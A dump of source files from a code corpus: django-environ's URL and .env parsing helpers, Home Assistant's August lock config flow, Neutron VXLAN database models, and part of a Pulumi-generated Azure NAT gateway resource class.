    path = unquote_plus(path.split('?', 2)[0])

    # Update with environment configuration
    config.update({
        'EMAIL_FILE_PATH': path,
        'EMAIL_HOST_USER': _cast_urlstr(url.username),
        'EMAIL_HOST_PASSWORD': _cast_urlstr(url.password),
        'EMAIL_HOST': url.hostname,
        'EMAIL_PORT': _cast_int(url.port),
    })

    if backend:
        config['EMAIL_BACKEND'] = backend
    elif url.scheme not in cls.EMAIL_SCHEMES:
        raise ImproperlyConfigured('Invalid email schema %s' % url.scheme)
    else:
        # At this point the scheme is necessarily known; the previous
        # ``elif url.scheme in cls.EMAIL_SCHEMES`` re-test was redundant.
        config['EMAIL_BACKEND'] = cls.EMAIL_SCHEMES[url.scheme]

    if url.scheme in ('smtps', 'smtp+tls'):
        config['EMAIL_USE_TLS'] = True
    elif url.scheme == 'smtp+ssl':
        config['EMAIL_USE_SSL'] = True

    if url.query:
        config_options = {}
        for k, v in parse_qs(url.query).items():
            opt = {k.upper(): _cast_int(v[0])}
            if k.upper() in cls._EMAIL_BASE_OPTIONS:
                config.update(opt)
            else:
                config_options.update(opt)
        config['OPTIONS'] = config_options

    return config
@classmethod
def search_url_config(cls, url, engine=None):
    """Parse a search URL into a Haystack-style connection dict.

    :param url: Search URL (string) or an already-parsed URL result.
    :param engine: Optional dotted path overriding the engine derived
        from the URL scheme.
    :return: dict with ENGINE plus backend-specific keys (URL, PATH,
        INDEX_NAME, ...).
    :raises ImproperlyConfigured: for an unknown search scheme.
    """
    config = {}

    url = urlparse(url) if not isinstance(url, cls.URL_CLASS) else url

    # Remove query strings.
    path = url.path[1:]
    path = unquote_plus(path.split('?', 2)[0])

    if url.scheme not in cls.SEARCH_SCHEMES:
        raise ImproperlyConfigured(
            'Invalid search schema %s' % url.scheme
        )
    config["ENGINE"] = cls.SEARCH_SCHEMES[url.scheme]

    # check commons params
    params = {}  # type: dict
    if url.query:
        params = parse_qs(url.query)
        if 'EXCLUDED_INDEXES' in params.keys():
            # Comma-separated list of index dotted paths.
            config['EXCLUDED_INDEXES'] \
                = params['EXCLUDED_INDEXES'][0].split(',')
        if 'INCLUDE_SPELLING' in params.keys():
            config['INCLUDE_SPELLING'] = cls.parse_value(
                params['INCLUDE_SPELLING'][0],
                bool
            )
        if 'BATCH_SIZE' in params.keys():
            config['BATCH_SIZE'] = cls.parse_value(
                params['BATCH_SIZE'][0],
                int
            )

    if url.scheme == 'simple':
        # The simple backend needs no connection details.
        return config
    elif url.scheme in ['solr'] + cls.ELASTICSEARCH_FAMILY:
        if 'KWARGS' in params.keys():
            config['KWARGS'] = params['KWARGS'][0]

    # remove trailing slash
    if path.endswith("/"):
        path = path[:-1]

    if url.scheme == 'solr':
        # Rebuild an http URL from the original netloc plus the path.
        config['URL'] = urlunparse(
            ('http',) + url[1:2] + (path,) + ('', '', '')
        )
        if 'TIMEOUT' in params.keys():
            config['TIMEOUT'] = cls.parse_value(params['TIMEOUT'][0], int)
        return config

    if url.scheme in cls.ELASTICSEARCH_FAMILY:
        # The last path component is the index name; the rest (if any)
        # stays part of the endpoint URL.
        split = path.rsplit("/", 1)

        if len(split) > 1:
            path = "/".join(split[:-1])
            index = split[-1]
        else:
            path = ""
            index = split[0]

        config['URL'] = urlunparse(
            ('http',) + url[1:2] + (path,) + ('', '', '')
        )
        if 'TIMEOUT' in params.keys():
            config['TIMEOUT'] = cls.parse_value(params['TIMEOUT'][0], int)
        config['INDEX_NAME'] = index
        return config

    # Remaining backends (whoosh, xapian) are filesystem based.
    config['PATH'] = '/' + path

    if url.scheme == 'whoosh':
        if 'STORAGE' in params.keys():
            config['STORAGE'] = params['STORAGE'][0]
        if 'POST_LIMIT' in params.keys():
            config['POST_LIMIT'] = cls.parse_value(
                params['POST_LIMIT'][0],
                int
            )
    elif url.scheme == 'xapian':
        if 'FLAGS' in params.keys():
            config['FLAGS'] = params['FLAGS'][0]

    if engine:
        config['ENGINE'] = engine

    return config
@classmethod
def read_env(cls, env_file=None, overwrite=False, **overrides):
    """Read a .env file into os.environ.

    If not given a path to a dotenv path, does filthy magic stack
    backtracking to find the dotenv in the same directory as the file that
    called read_env.

    Existing environment variables take precedent and are NOT overwritten
    by the file content. ``overwrite=True`` will force an overwrite of
    existing environment variables.

    Refs:
    - https://wellfire.co/learn/easier-12-factor-django
    - https://gist.github.com/bennylope/2999704

    :param env_file: The path to the `.env` file your application should
        use. If a path is not provided, `read_env` will attempt to import
        the Django settings module from the Django project root.
    :param overwrite: ``overwrite=True`` will force an overwrite of
        existing environment variables.
    :param **overrides: Any additional keyword arguments provided directly
        to read_env will be added to the environment. If the key matches an
        existing environment variable, the value will be overridden.
    """
    if env_file is None:
        # Walk one frame up the stack so the .env is resolved relative
        # to the *caller's* file, not this module.
        frame = sys._getframe()
        env_file = os.path.join(
            os.path.dirname(frame.f_back.f_code.co_filename),
            '.env'
        )
        if not os.path.exists(env_file):
            logger.info(
                "%s doesn't exist - if you're not configuring your "
                "environment separately, create one." % env_file)
            return

    try:
        if isinstance(env_file, Openable):
            # Python 3.5 support (wrap path with str).
            with open(str(env_file)) as f:
                content = f.read()
        else:
            # Assume an already-open file-like object.
            with env_file as f:
                content = f.read()
    except OSError:
        logger.info(
            "%s not found - if you're not configuring your "
            "environment separately, check this." % env_file)
        return

    logger.debug('Read environment variables from: {}'.format(env_file))

    def _keep_escaped_format_characters(match):
        """Keep escaped newline/tabs in quoted strings"""
        escaped_char = match.group(1)

        if escaped_char in 'rnt':
            return '\\' + escaped_char
        return escaped_char

    for line in content.splitlines():
        # KEY=value, with an optional leading "export ".
        m1 = re.match(r'\A(?:export )?([A-Za-z_0-9]+)=(.*)\Z', line)
        if m1:
            key, val = m1.group(1), m1.group(2)
            # Single-quoted values are taken literally...
            m2 = re.match(r"\A'(.*)'\Z", val)
            if m2:
                val = m2.group(1)
            # ...double-quoted values get escape processing.
            m3 = re.match(r'\A"(.*)"\Z', val)
            if m3:
                val = re.sub(r'\\(.)', _keep_escaped_format_characters,
                             m3.group(1))
            overrides[key] = str(val)
        elif not line or line.startswith('#'):
            # ignore warnings for empty line-breaks or comments
            pass
        else:
            logger.warning('Invalid line: %s', line)

    def set_environ(envval):
        """Return lambda to set environ.

        Use setdefault unless overwrite is specified.
        """
        if overwrite:
            return lambda k, v: envval.update({k: str(v)})
        return lambda k, v: envval.setdefault(k, str(v))

    setenv = set_environ(cls.ENVIRON)

    for key, value in overrides.items():
        setenv(key, value)
class FileAwareEnv(Env):
    """
    First look for environment variables with ``_FILE`` appended. If found,
    their contents will be read from the file system and used instead.

    Use as a drop-in replacement for the standard ``environ.Env``:

    .. code-block:: python

        python env = environ.FileAwareEnv()

    For example, if a ``SECRET_KEY_FILE`` environment variable was set,
    ``env("SECRET_KEY")`` would find the related variable, returning the file
    contents rather than ever looking up a ``SECRET_KEY`` environment variable.
    """

    # Overrides Env.ENVIRON: a mapping that transparently resolves FOO via
    # FOO_FILE when present.
    ENVIRON = FileAwareMapping()
class Path:
    """Inspired to Django Two-scoops, handling File Paths in Settings.

    Wraps an absolute filesystem path (``self.__root__``) and supports
    path algebra: ``/``-free joining via ``path()``/``__call__``,
    ``+`` to append a component, ``-`` to strip a suffix or go up
    ``n`` directories, ``~`` to go up one, and ``in`` for containment.
    """

    def path(self, *paths, **kwargs):
        """Create new Path based on self.root and provided paths.

        :param paths: List of sub paths
        :param kwargs: required=False
        :rtype: Path
        """
        return self.__class__(self.__root__, *paths, **kwargs)

    def file(self, name, *args, **kwargs):
        """Open a file.

        :param name: Filename appended to self.root
        :param args: passed to open()
        :param kwargs: passed to open()
        :rtype: file
        """
        return open(self(name), *args, **kwargs)

    @property
    def root(self):
        """Current directory for this Path"""
        return self.__root__

    def __init__(self, start='', *paths, **kwargs):
        super().__init__()

        if kwargs.get('is_file', False):
            # Treat ``start`` as a file path: anchor at its directory.
            start = os.path.dirname(start)
        self.__root__ = self._absolute_join(start, *paths, **kwargs)

    def __call__(self, *paths, **kwargs):
        """Retrieve the absolute path, with appended paths

        :param paths: List of sub path of self.root
        :param kwargs: required=False
        """
        return self._absolute_join(self.__root__, *paths, **kwargs)

    def __eq__(self, other):
        return self.__root__ == other.__root__

    def __ne__(self, other):
        return not self.__eq__(other)

    def __hash__(self):
        # Defining __eq__ alone would set __hash__ to None and make Path
        # unhashable (unusable as a dict key / set member); hash on the
        # same value equality is based on.
        return hash(self.__root__)

    def __add__(self, other):
        if not isinstance(other, Path):
            return Path(self.__root__, other)
        return Path(self.__root__, other.__root__)

    def __sub__(self, other):
        if isinstance(other, int):
            # Go ``other`` directories up.
            return self.path('../' * other)
        elif isinstance(other, str):
            if self.__root__.endswith(other):
                # BUGFIX: the previous ``rstrip(other)`` stripped any run of
                # the *characters* in ``other`` (e.g. '/a/foofoo' - 'foo'
                # yielded '/a'); slice off exactly the matched suffix.
                return Path(self.__root__[:len(self.__root__) - len(other)])
        raise TypeError(
            "unsupported operand type(s) for -: '{self}' and '{other}' "
            "unless value of {self} ends with value of {other}".format(
                self=type(self), other=type(other)
            )
        )

    def __invert__(self):
        return self.path('..')

    def __contains__(self, item):
        base_path = self.__root__
        if len(base_path) > 1:
            # Append a separator so '/ab' is not considered inside '/a'.
            base_path = os.path.join(base_path, '')
        return item.__root__.startswith(base_path)

    def __repr__(self):
        return "<Path:{}>".format(self.__root__)

    def __str__(self):
        return self.__root__

    def __unicode__(self):
        return self.__str__()

    def __getitem__(self, *args, **kwargs):
        return self.__str__().__getitem__(*args, **kwargs)

    def __fspath__(self):
        # os.PathLike support: open(), os.path.* etc. accept Path directly.
        return self.__str__()

    def rfind(self, *args, **kwargs):
        return self.__str__().rfind(*args, **kwargs)

    def find(self, *args, **kwargs):
        return self.__str__().find(*args, **kwargs)

    @staticmethod
    def _absolute_join(base, *paths, **kwargs):
        absolute_path = os.path.abspath(os.path.join(base, *paths))
        if kwargs.get('required', False) and not os.path.exists(absolute_path):
            raise ImproperlyConfigured(
                "Create required path: {}".format(absolute_path))
        return absolute_path
def register_scheme(scheme):
    """Teach ``urllib.parse`` to fully parse URLs using ``scheme``.

    Appends the scheme to every ``uses_*`` registry list of the module
    (``uses_netloc``, ``uses_relative``, ...) so netloc, query and
    fragment components are recognised for it.
    """
    registries = [
        getattr(urlparselib, attr)
        for attr in dir(urlparselib)
        if attr.startswith('uses_')
    ]
    for registry in registries:
        registry.append(scheme)


def register_schemes(schemes):
    """Register every scheme in ``schemes`` with ``urllib.parse``."""
    for entry in schemes:
        register_scheme(entry)
# Register database and cache schemes in URLs so that urlparse splits
# netloc/path/query components correctly for these custom schemes.
register_schemes(Env.DB_SCHEMES.keys())
register_schemes(Env.CACHE_SCHEMES.keys())
register_schemes(Env.SEARCH_SCHEMES.keys())
register_schemes(Env.EMAIL_SCHEMES.keys())
| 32.498492 | 79 | 0.553377 |
acdfb1d4b63979f81b364b8022c70046325ccb0d | 4,406 | py | Python | homeassistant/components/august/config_flow.py | domwillcode/home-assistant | f170c80bea70c939c098b5c88320a1c789858958 | [
"Apache-2.0"
] | 7 | 2019-02-07T14:14:12.000Z | 2019-07-28T06:56:10.000Z | homeassistant/components/august/config_flow.py | domwillcode/home-assistant | f170c80bea70c939c098b5c88320a1c789858958 | [
"Apache-2.0"
] | 47 | 2020-07-23T07:14:33.000Z | 2022-03-31T06:01:46.000Z | homeassistant/components/august/config_flow.py | klauern/home-assistant-core | c18ba6aec0627e6afb6442c678edb5ff2bb17db6 | [
"Apache-2.0"
] | 5 | 2020-03-29T00:29:13.000Z | 2021-09-06T20:58:40.000Z | """Config flow for August integration."""
import logging
from august.authenticator import ValidationResult
import voluptuous as vol
from homeassistant import config_entries, core
from homeassistant.const import CONF_PASSWORD, CONF_TIMEOUT, CONF_USERNAME
from .const import (
CONF_LOGIN_METHOD,
DEFAULT_TIMEOUT,
LOGIN_METHODS,
VERIFICATION_CODE_KEY,
)
from .const import DOMAIN # pylint:disable=unused-import
from .exceptions import CannotConnect, InvalidAuth, RequireValidation
from .gateway import AugustGateway
_LOGGER = logging.getLogger(__name__)

# Schema for the initial "user" config-flow step: login method,
# credentials, and an optional API timeout (coerced to int).
DATA_SCHEMA = vol.Schema(
    {
        vol.Required(CONF_LOGIN_METHOD, default="phone"): vol.In(LOGIN_METHODS),
        vol.Required(CONF_USERNAME): str,
        vol.Required(CONF_PASSWORD): str,
        vol.Optional(CONF_TIMEOUT, default=DEFAULT_TIMEOUT): vol.Coerce(int),
    }
)
async def async_validate_input(
    hass: core.HomeAssistant, data, august_gateway,
):
    """Validate the user input allows us to connect.

    ``data`` carries the keys from DATA_SCHEMA with user-provided values.
    Raises RequireValidation when a (new) verification code is needed,
    CannotConnect/InvalidAuth on gateway failures.
    """
    verification_code = data.get(VERIFICATION_CODE_KEY)
    have_code = verification_code is not None

    if have_code:
        validation_result = await august_gateway.authenticator.async_validate_verification_code(
            verification_code
        )
        _LOGGER.debug("Verification code validation: %s", validation_result)
        if validation_result != ValidationResult.VALIDATED:
            raise RequireValidation

    try:
        await august_gateway.async_authenticate()
    except RequireValidation:
        _LOGGER.debug(
            "Requesting new verification code for %s via %s",
            data.get(CONF_USERNAME),
            data.get(CONF_LOGIN_METHOD),
        )
        if not have_code:
            # Only push a fresh code when the user has not supplied one yet.
            await august_gateway.authenticator.async_send_verification_code()
        raise

    return {
        "title": data.get(CONF_USERNAME),
        "data": august_gateway.config_entry(),
    }
class AugustConfigFlow(config_entries.ConfigFlow, domain=DOMAIN):
    """Handle a config flow for August."""

    VERSION = 1
    CONNECTION_CLASS = config_entries.CONN_CLASS_CLOUD_POLL

    def __init__(self):
        """Store an AugustGateway()."""
        # Gateway is created lazily in async_step_user (needs self.hass).
        self._august_gateway = None
        # Credentials kept between the user step and the 2FA step.
        self.user_auth_details = {}
        super().__init__()

    async def async_step_user(self, user_input=None):
        """Handle the initial step."""
        if self._august_gateway is None:
            self._august_gateway = AugustGateway(self.hass)
        errors = {}
        if user_input is not None:
            await self._august_gateway.async_setup(user_input)

            try:
                info = await async_validate_input(
                    self.hass, user_input, self._august_gateway,
                )
                # One entry per August account (keyed by username).
                await self.async_set_unique_id(user_input[CONF_USERNAME])
                return self.async_create_entry(title=info["title"], data=info["data"])
            except CannotConnect:
                errors["base"] = "cannot_connect"
            except InvalidAuth:
                errors["base"] = "invalid_auth"
            except RequireValidation:
                # 2FA needed: stash the credentials and ask for the code.
                self.user_auth_details = user_input
                return await self.async_step_validation()
            except Exception:  # pylint: disable=broad-except
                _LOGGER.exception("Unexpected exception")
                errors["base"] = "unknown"

        # First call (or a failed attempt): (re)show the credentials form.
        return self.async_show_form(
            step_id="user", data_schema=DATA_SCHEMA, errors=errors
        )

    async def async_step_validation(self, user_input=None):
        """Handle validation (2fa) step."""
        if user_input:
            # Merge the code into the stored credentials and retry login.
            return await self.async_step_user({**self.user_auth_details, **user_input})

        return self.async_show_form(
            step_id="validation",
            data_schema=vol.Schema(
                {vol.Required(VERIFICATION_CODE_KEY): vol.All(str, vol.Strip)}
            ),
            description_placeholders={
                CONF_USERNAME: self.user_auth_details.get(CONF_USERNAME),
                CONF_LOGIN_METHOD: self.user_auth_details.get(CONF_LOGIN_METHOD),
            },
        )

    async def async_step_import(self, user_input):
        """Handle import."""
        await self.async_set_unique_id(user_input[CONF_USERNAME])
        self._abort_if_unique_id_configured()
        return await self.async_step_user(user_input)
| 32.880597 | 87 | 0.650931 |
acdfb21a8627081d8d7639d95510988f06f8e6f1 | 1,716 | py | Python | neutron/db/models/plugins/ml2/vxlanallocation.py | EwaldvanGeffen/neutron | 858d7f33950a80c73501377a4b2cd36b915d0f40 | [
"Apache-2.0"
] | 1 | 2020-01-29T17:06:17.000Z | 2020-01-29T17:06:17.000Z | neutron/db/models/plugins/ml2/vxlanallocation.py | EwaldvanGeffen/neutron | 858d7f33950a80c73501377a4b2cd36b915d0f40 | [
"Apache-2.0"
] | 5 | 2019-08-14T06:46:03.000Z | 2021-12-13T20:01:25.000Z | neutron/db/models/plugins/ml2/vxlanallocation.py | EwaldvanGeffen/neutron | 858d7f33950a80c73501377a4b2cd36b915d0f40 | [
"Apache-2.0"
] | 2 | 2020-03-15T01:24:15.000Z | 2020-07-22T20:34:26.000Z | # Copyright (c) 2013 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from neutron_lib.db import model_base
import sqlalchemy as sa
from sqlalchemy import sql
class VxlanAllocation(model_base.BASEV2):
    """DB model tracking allocation state of VXLAN VNIs (ML2)."""

    __tablename__ = 'ml2_vxlan_allocations'

    # The VNI value itself is the key — it is a fixed identifier, not a
    # generated id, hence autoincrement=False.
    vxlan_vni = sa.Column(sa.Integer, nullable=False, primary_key=True,
                          autoincrement=False)
    # Indexed so allocated/free rows can be filtered efficiently.
    allocated = sa.Column(sa.Boolean, nullable=False, default=False,
                          server_default=sql.false(), index=True)

    @classmethod
    def get_segmentation_id(cls):
        """Return the column holding the segmentation ID (the VNI)."""
        return cls.vxlan_vni
class VxlanEndpoints(model_base.BASEV2):
    """Represents tunnel endpoint in RPC mode."""

    __tablename__ = 'ml2_vxlan_endpoints'
    __table_args__ = (
        # At most one endpoint row per host.
        sa.UniqueConstraint('host',
                            name='unique_ml2_vxlan_endpoints0host'),
        model_base.BASEV2.__table_args__
    )
    # The endpoint IP is the primary key.
    ip_address = sa.Column(sa.String(64), primary_key=True)
    udp_port = sa.Column(sa.Integer, nullable=False)
    host = sa.Column(sa.String(255), nullable=True)

    def __repr__(self):
        return "<VxlanTunnelEndpoint(%s)>" % self.ip_address
| 34.32 | 78 | 0.694639 |
acdfb23e804a16aa263b51152773efda90eb9ad1 | 19,856 | py | Python | sdk/python/pulumi_azure_native/network/v20200701/nat_gateway.py | sebtelko/pulumi-azure-native | 711ec021b5c73da05611c56c8a35adb0ce3244e4 | [
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_azure_native/network/v20200701/nat_gateway.py | sebtelko/pulumi-azure-native | 711ec021b5c73da05611c56c8a35adb0ce3244e4 | [
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_azure_native/network/v20200701/nat_gateway.py | sebtelko/pulumi-azure-native | 711ec021b5c73da05611c56c8a35adb0ce3244e4 | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
from ._enums import *
from ._inputs import *
__all__ = ['NatGatewayArgs', 'NatGateway']
@pulumi.input_type
class NatGatewayArgs:
    # NOTE: auto-generated by the Pulumi SDK generator (see file header);
    # properties mirror the Azure NAT gateway API surface. Do not hand-edit
    # logic — regenerate instead.
    def __init__(__self__, *,
                 resource_group_name: pulumi.Input[str],
                 id: Optional[pulumi.Input[str]] = None,
                 idle_timeout_in_minutes: Optional[pulumi.Input[int]] = None,
                 location: Optional[pulumi.Input[str]] = None,
                 nat_gateway_name: Optional[pulumi.Input[str]] = None,
                 public_ip_addresses: Optional[pulumi.Input[Sequence[pulumi.Input['SubResourceArgs']]]] = None,
                 public_ip_prefixes: Optional[pulumi.Input[Sequence[pulumi.Input['SubResourceArgs']]]] = None,
                 sku: Optional[pulumi.Input['NatGatewaySkuArgs']] = None,
                 tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 zones: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
        """
        The set of arguments for constructing a NatGateway resource.
        :param pulumi.Input[str] resource_group_name: The name of the resource group.
        :param pulumi.Input[str] id: Resource ID.
        :param pulumi.Input[int] idle_timeout_in_minutes: The idle timeout of the nat gateway.
        :param pulumi.Input[str] location: Resource location.
        :param pulumi.Input[str] nat_gateway_name: The name of the nat gateway.
        :param pulumi.Input[Sequence[pulumi.Input['SubResourceArgs']]] public_ip_addresses: An array of public ip addresses associated with the nat gateway resource.
        :param pulumi.Input[Sequence[pulumi.Input['SubResourceArgs']]] public_ip_prefixes: An array of public ip prefixes associated with the nat gateway resource.
        :param pulumi.Input['NatGatewaySkuArgs'] sku: The nat gateway SKU.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Resource tags.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] zones: A list of availability zones denoting the zone in which Nat Gateway should be deployed.
        """
        # Only the non-None optionals are stored, so absent values never
        # reach the engine.
        pulumi.set(__self__, "resource_group_name", resource_group_name)
        if id is not None:
            pulumi.set(__self__, "id", id)
        if idle_timeout_in_minutes is not None:
            pulumi.set(__self__, "idle_timeout_in_minutes", idle_timeout_in_minutes)
        if location is not None:
            pulumi.set(__self__, "location", location)
        if nat_gateway_name is not None:
            pulumi.set(__self__, "nat_gateway_name", nat_gateway_name)
        if public_ip_addresses is not None:
            pulumi.set(__self__, "public_ip_addresses", public_ip_addresses)
        if public_ip_prefixes is not None:
            pulumi.set(__self__, "public_ip_prefixes", public_ip_prefixes)
        if sku is not None:
            pulumi.set(__self__, "sku", sku)
        if tags is not None:
            pulumi.set(__self__, "tags", tags)
        if zones is not None:
            pulumi.set(__self__, "zones", zones)

    @property
    @pulumi.getter(name="resourceGroupName")
    def resource_group_name(self) -> pulumi.Input[str]:
        """
        The name of the resource group.
        """
        return pulumi.get(self, "resource_group_name")

    @resource_group_name.setter
    def resource_group_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "resource_group_name", value)

    @property
    @pulumi.getter
    def id(self) -> Optional[pulumi.Input[str]]:
        """
        Resource ID.
        """
        return pulumi.get(self, "id")

    @id.setter
    def id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "id", value)

    @property
    @pulumi.getter(name="idleTimeoutInMinutes")
    def idle_timeout_in_minutes(self) -> Optional[pulumi.Input[int]]:
        """
        The idle timeout of the nat gateway.
        """
        return pulumi.get(self, "idle_timeout_in_minutes")

    @idle_timeout_in_minutes.setter
    def idle_timeout_in_minutes(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "idle_timeout_in_minutes", value)

    @property
    @pulumi.getter
    def location(self) -> Optional[pulumi.Input[str]]:
        """
        Resource location.
        """
        return pulumi.get(self, "location")

    @location.setter
    def location(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "location", value)

    @property
    @pulumi.getter(name="natGatewayName")
    def nat_gateway_name(self) -> Optional[pulumi.Input[str]]:
        """
        The name of the nat gateway.
        """
        return pulumi.get(self, "nat_gateway_name")

    @nat_gateway_name.setter
    def nat_gateway_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "nat_gateway_name", value)

    @property
    @pulumi.getter(name="publicIpAddresses")
    def public_ip_addresses(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['SubResourceArgs']]]]:
        """
        An array of public ip addresses associated with the nat gateway resource.
        """
        return pulumi.get(self, "public_ip_addresses")

    @public_ip_addresses.setter
    def public_ip_addresses(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['SubResourceArgs']]]]):
        pulumi.set(self, "public_ip_addresses", value)

    @property
    @pulumi.getter(name="publicIpPrefixes")
    def public_ip_prefixes(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['SubResourceArgs']]]]:
        """
        An array of public ip prefixes associated with the nat gateway resource.
        """
        return pulumi.get(self, "public_ip_prefixes")

    @public_ip_prefixes.setter
    def public_ip_prefixes(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['SubResourceArgs']]]]):
        pulumi.set(self, "public_ip_prefixes", value)

    @property
    @pulumi.getter
    def sku(self) -> Optional[pulumi.Input['NatGatewaySkuArgs']]:
        """
        The nat gateway SKU.
        """
        return pulumi.get(self, "sku")

    @sku.setter
    def sku(self, value: Optional[pulumi.Input['NatGatewaySkuArgs']]):
        pulumi.set(self, "sku", value)

    @property
    @pulumi.getter
    def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
        """
        Resource tags.
        """
        return pulumi.get(self, "tags")

    @tags.setter
    def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
        pulumi.set(self, "tags", value)

    @property
    @pulumi.getter
    def zones(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        A list of availability zones denoting the zone in which Nat Gateway should be deployed.
        """
        return pulumi.get(self, "zones")

    @zones.setter
    def zones(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "zones", value)
class NatGateway(pulumi.CustomResource):
# Overload: construct a NatGateway from individual keyword properties.
@overload
def __init__(__self__,
             resource_name: str,
             opts: Optional[pulumi.ResourceOptions] = None,
             id: Optional[pulumi.Input[str]] = None,
             idle_timeout_in_minutes: Optional[pulumi.Input[int]] = None,
             location: Optional[pulumi.Input[str]] = None,
             nat_gateway_name: Optional[pulumi.Input[str]] = None,
             public_ip_addresses: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['SubResourceArgs']]]]] = None,
             public_ip_prefixes: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['SubResourceArgs']]]]] = None,
             resource_group_name: Optional[pulumi.Input[str]] = None,
             sku: Optional[pulumi.Input[pulumi.InputType['NatGatewaySkuArgs']]] = None,
             tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
             zones: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
             __props__=None):
    """
    Nat Gateway resource.

    :param str resource_name: The name of the resource.
    :param pulumi.ResourceOptions opts: Options for the resource.
    :param pulumi.Input[str] id: Resource ID.
    :param pulumi.Input[int] idle_timeout_in_minutes: The idle timeout of the nat gateway.
    :param pulumi.Input[str] location: Resource location.
    :param pulumi.Input[str] nat_gateway_name: The name of the nat gateway.
    :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['SubResourceArgs']]]] public_ip_addresses: An array of public ip addresses associated with the nat gateway resource.
    :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['SubResourceArgs']]]] public_ip_prefixes: An array of public ip prefixes associated with the nat gateway resource.
    :param pulumi.Input[str] resource_group_name: The name of the resource group.
    :param pulumi.Input[pulumi.InputType['NatGatewaySkuArgs']] sku: The nat gateway SKU.
    :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Resource tags.
    :param pulumi.Input[Sequence[pulumi.Input[str]]] zones: A list of availability zones denoting the zone in which Nat Gateway should be deployed.
    """
    ...
# Overload: construct a NatGateway from a pre-built NatGatewayArgs object.
@overload
def __init__(__self__,
             resource_name: str,
             args: NatGatewayArgs,
             opts: Optional[pulumi.ResourceOptions] = None):
    """
    Nat Gateway resource.

    :param str resource_name: The name of the resource.
    :param NatGatewayArgs args: The arguments to use to populate this resource's properties.
    :param pulumi.ResourceOptions opts: Options for the resource.
    """
    ...
def __init__(__self__, resource_name: str, *args, **kwargs):
    # Runtime dispatcher for the two @overload signatures above: detect
    # whether an args object or keyword properties were given, then
    # forward both forms to _internal_init.
    resource_args, opts = _utilities.get_resource_args_opts(NatGatewayArgs, pulumi.ResourceOptions, *args, **kwargs)
    if resource_args is not None:
        __self__._internal_init(resource_name, opts, **resource_args.__dict__)
    else:
        __self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
                   resource_name: str,
                   opts: Optional[pulumi.ResourceOptions] = None,
                   id: Optional[pulumi.Input[str]] = None,
                   idle_timeout_in_minutes: Optional[pulumi.Input[int]] = None,
                   location: Optional[pulumi.Input[str]] = None,
                   nat_gateway_name: Optional[pulumi.Input[str]] = None,
                   public_ip_addresses: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['SubResourceArgs']]]]] = None,
                   public_ip_prefixes: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['SubResourceArgs']]]]] = None,
                   resource_group_name: Optional[pulumi.Input[str]] = None,
                   sku: Optional[pulumi.Input[pulumi.InputType['NatGatewaySkuArgs']]] = None,
                   tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                   zones: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                   __props__=None):
    # Shared constructor body for both __init__ overloads (generated code).
    if opts is None:
        opts = pulumi.ResourceOptions()
    if not isinstance(opts, pulumi.ResourceOptions):
        raise TypeError('Expected resource options to be a ResourceOptions instance')
    if opts.version is None:
        opts.version = _utilities.get_version()
    # opts.id set means "adopt an existing resource": then no input
    # properties may be supplied (__props__ comes from get() instead).
    if opts.id is None:
        if __props__ is not None:
            raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
        __props__ = NatGatewayArgs.__new__(NatGatewayArgs)

        __props__.__dict__["id"] = id
        __props__.__dict__["idle_timeout_in_minutes"] = idle_timeout_in_minutes
        __props__.__dict__["location"] = location
        __props__.__dict__["nat_gateway_name"] = nat_gateway_name
        __props__.__dict__["public_ip_addresses"] = public_ip_addresses
        __props__.__dict__["public_ip_prefixes"] = public_ip_prefixes
        if resource_group_name is None and not opts.urn:
            raise TypeError("Missing required property 'resource_group_name'")
        __props__.__dict__["resource_group_name"] = resource_group_name
        __props__.__dict__["sku"] = sku
        __props__.__dict__["tags"] = tags
        __props__.__dict__["zones"] = zones
        # Output-only properties start as None; the engine fills them in.
        __props__.__dict__["etag"] = None
        __props__.__dict__["name"] = None
        __props__.__dict__["provisioning_state"] = None
        __props__.__dict__["resource_guid"] = None
        __props__.__dict__["subnets"] = None
